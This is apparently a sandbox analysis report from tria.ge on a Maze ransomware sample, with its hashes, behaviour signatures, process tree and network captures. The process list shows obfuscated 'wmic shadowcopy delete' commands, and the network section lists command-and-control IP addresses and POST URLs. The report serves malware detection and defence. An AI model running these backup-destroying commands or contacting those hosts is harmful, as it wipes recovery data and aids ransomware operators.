Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

d65fa9ed12...25.exe

windows7_x64

10

d65fa9ed12...25.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    24/06/2020, 13:14 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe

  • Size

    351KB

  • MD5

    391370b48b8f64f86c628742b03de53a

  • SHA1

    0c4ef4daef2458ae999d2d3bf3ee837491369a25

  • SHA256

    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125

  • SHA512

    62527b56eb597c1a177f154793f0734ed3e54df7dfd36e619f07a44cee2e22190920fbd15d34a5c8fcdd54853cbad95a797c6fbadc0f5f19ddf25b13945b4adf

Score
10/10
trojanransomwaremazepersistencespyware

Malware Config

Signatures

  • Drops startup file 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 87 IoCs
  • Maze

    Ransomware family also known as ChaCha.

    trojanransomwaremaze
  • Modifies service 2 TTPs 5 IoCs
    persistence
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    "C:\Users\Admin\AppData\Local\Temp\d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe"
    1⤵
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Sets desktop wallpaper using registry
    PID:2728
    • C:\Windows\system32\wbem\wmic.exe
      "C:\e\..\Windows\lf\..\system32\owj\cdic\nngq\..\..\..\wbem\qdp\tard\..\..\wmic.exe" shadowcopy delete
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3016
    • C:\Windows\system32\wbem\wmic.exe
      "C:\wg\u\iymu\..\..\..\Windows\weokv\mouoy\vsg\..\..\..\system32\pe\lfwu\..\..\wbem\wbhic\..\wmic.exe" shadowcopy delete
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2988
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:3144

Network

  • flag-unknown
    POST
    http://92.63.17.245/support/sjjydva.do?lk=vtkkm7&udf=65ig&ap=v246ub5j1&apno=w3w63b
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    Remote address:
    92.63.17.245:80
    Request
    POST /support/sjjydva.do?lk=vtkkm7&udf=65ig&ap=v246ub5j1&apno=w3w63b HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
    Host: 92.63.17.245
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 214
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Moved Temporarily
    Server: nginx
    Date: Wed, 24 Jun 2020 13:47:28 GMT
    Content-Type: text/html
    Content-Length: 138
    Location: http://92.63.17.245/?lk=vtkkm7&udf=65ig&ap=v246ub5j1&apno=w3w63b
    Connection: keep-alive
    Keep-Alive: timeout=20
  • flag-unknown
    POST
    http://92.63.32.55/check/prkvsjplsr.phtml?k=1xpbq0&kf=xf2
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    Remote address:
    92.63.32.55:80
    Request
    POST /check/prkvsjplsr.phtml?k=1xpbq0&kf=xf2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
    Host: 92.63.32.55
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 214
    Connection: Keep-Alive
    Response
    HTTP/1.1 500 Internal Server Error
    Server: nginx
    Date: Wed, 24 Jun 2020 13:47:28 GMT
    Content-Type: text/html
    Content-Length: 186
    Connection: close
  • flag-unknown
    POST
    http://92.63.17.245/logout/transfer/yymdgpad.html?qvki=2ulx11&wsv=n3q7&cu=l5lc&g=5326572
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    Remote address:
    92.63.17.245:80
    Request
    POST /logout/transfer/yymdgpad.html?qvki=2ulx11&wsv=n3q7&cu=l5lc&g=5326572 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
    Host: 92.63.17.245
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 49
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Moved Temporarily
    Server: nginx
    Date: Wed, 24 Jun 2020 13:47:46 GMT
    Content-Type: text/html
    Content-Length: 138
    Location: http://92.63.17.245/?qvki=2ulx11&wsv=n3q7&cu=l5lc&g=5326572
    Connection: keep-alive
    Keep-Alive: timeout=20
  • flag-unknown
    POST
    http://92.63.32.55/support/support/k.shtml
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    Remote address:
    92.63.32.55:80
    Request
    POST /support/support/k.shtml HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
    Host: 92.63.32.55
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 49
    Connection: Keep-Alive
    Response
    HTTP/1.1 500 Internal Server Error
    Server: nginx
    Date: Wed, 24 Jun 2020 13:47:46 GMT
    Content-Type: text/html
    Content-Length: 186
    Connection: close
  • 138.128.167.210:587
    110 B
     46 B
     1
    1
  • 92.63.8.47:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.8.47:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.8.47:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.8.47:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.32.2:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     120 B
     3
    3
  • 92.63.32.2:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     120 B
     3
    3
  • 92.63.37.100:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     120 B
     3
    3
  • 92.63.37.100:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     120 B
     3
    3
  • 92.63.194.20:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.32.2:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     120 B
     3
    3
  • 127.0.0.1:47001
  • 92.63.32.2:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     120 B
     3
    3
  • 92.63.37.100:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     120 B
     3
    3
  • 92.63.37.100:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     120 B
     3
    3
  • 92.63.194.20:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.194.20:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.194.20:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.17.245:80
    http://92.63.17.245/support/sjjydva.do?lk=vtkkm7&udf=65ig&ap=v246ub5j1&apno=w3w63b
    http
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    725 B
     566 B
     5
    4

    HTTP Request

    POST http://92.63.17.245/support/sjjydva.do?lk=vtkkm7&udf=65ig&ap=v246ub5j1&apno=w3w63b

    HTTP Response

    302
  • 92.63.32.55:80
    http://92.63.32.55/check/prkvsjplsr.phtml?k=1xpbq0&kf=xf2
    http
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    700 B
     509 B
     5
    4

    HTTP Request

    POST http://92.63.32.55/check/prkvsjplsr.phtml?k=1xpbq0&kf=xf2

    HTTP Response

    500
  • 92.63.11.151:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.17.245:80
    http://92.63.17.245/logout/transfer/yymdgpad.html?qvki=2ulx11&wsv=n3q7&cu=l5lc&g=5326572
    http
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    565 B
     561 B
     5
    4

    HTTP Request

    POST http://92.63.17.245/logout/transfer/yymdgpad.html?qvki=2ulx11&wsv=n3q7&cu=l5lc&g=5326572

    HTTP Response

    302
  • 92.63.32.55:80
    http://92.63.32.55/support/support/k.shtml
    http
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    519 B
     509 B
     5
    4

    HTTP Request

    POST http://92.63.32.55/support/support/k.shtml

    HTTP Response

    500
  • 92.63.11.151:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.11.151:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.11.151:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.194.3:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     120 B
     3
    3
  • 92.63.194.3:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     120 B
     3
    3
  • 92.63.15.8:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    156 B
     3
  • 92.63.194.3:80
    d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
  • 239.255.255.250:1900
    1.3kB
     8
  • 239.255.255.250:1900
  • 10.10.0.255:137
    netbios-ns
    288 B
     3
  • 10.10.0.28:137
    netbios-ns
    270 B
     3
  • 10.10.0.18:137
    netbios-ns
    270 B
     3
  • 10.10.0.40:137
    netbios-ns
    270 B
     3
  • 10.10.0.20:137
    netbios-ns
    270 B
     3
  • 10.10.0.11:137
    netbios-ns
    270 B
     3
  • 10.10.0.13:137
    netbios-ns
    270 B
     3
  • 10.10.0.30:137
    netbios-ns
    270 B
     3
  • 10.10.0.35:137
    netbios-ns
    270 B
     3
  • 10.10.0.21:137
    netbios-ns
    270 B
     3
  • 10.10.0.23:137
    netbios-ns
    270 B
     3
  • 10.10.0.14:137
    netbios-ns
    270 B
     3
  • 10.10.0.25:137
    netbios-ns
    270 B
     3
  • 10.10.0.34:137
    netbios-ns
    270 B
     3

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.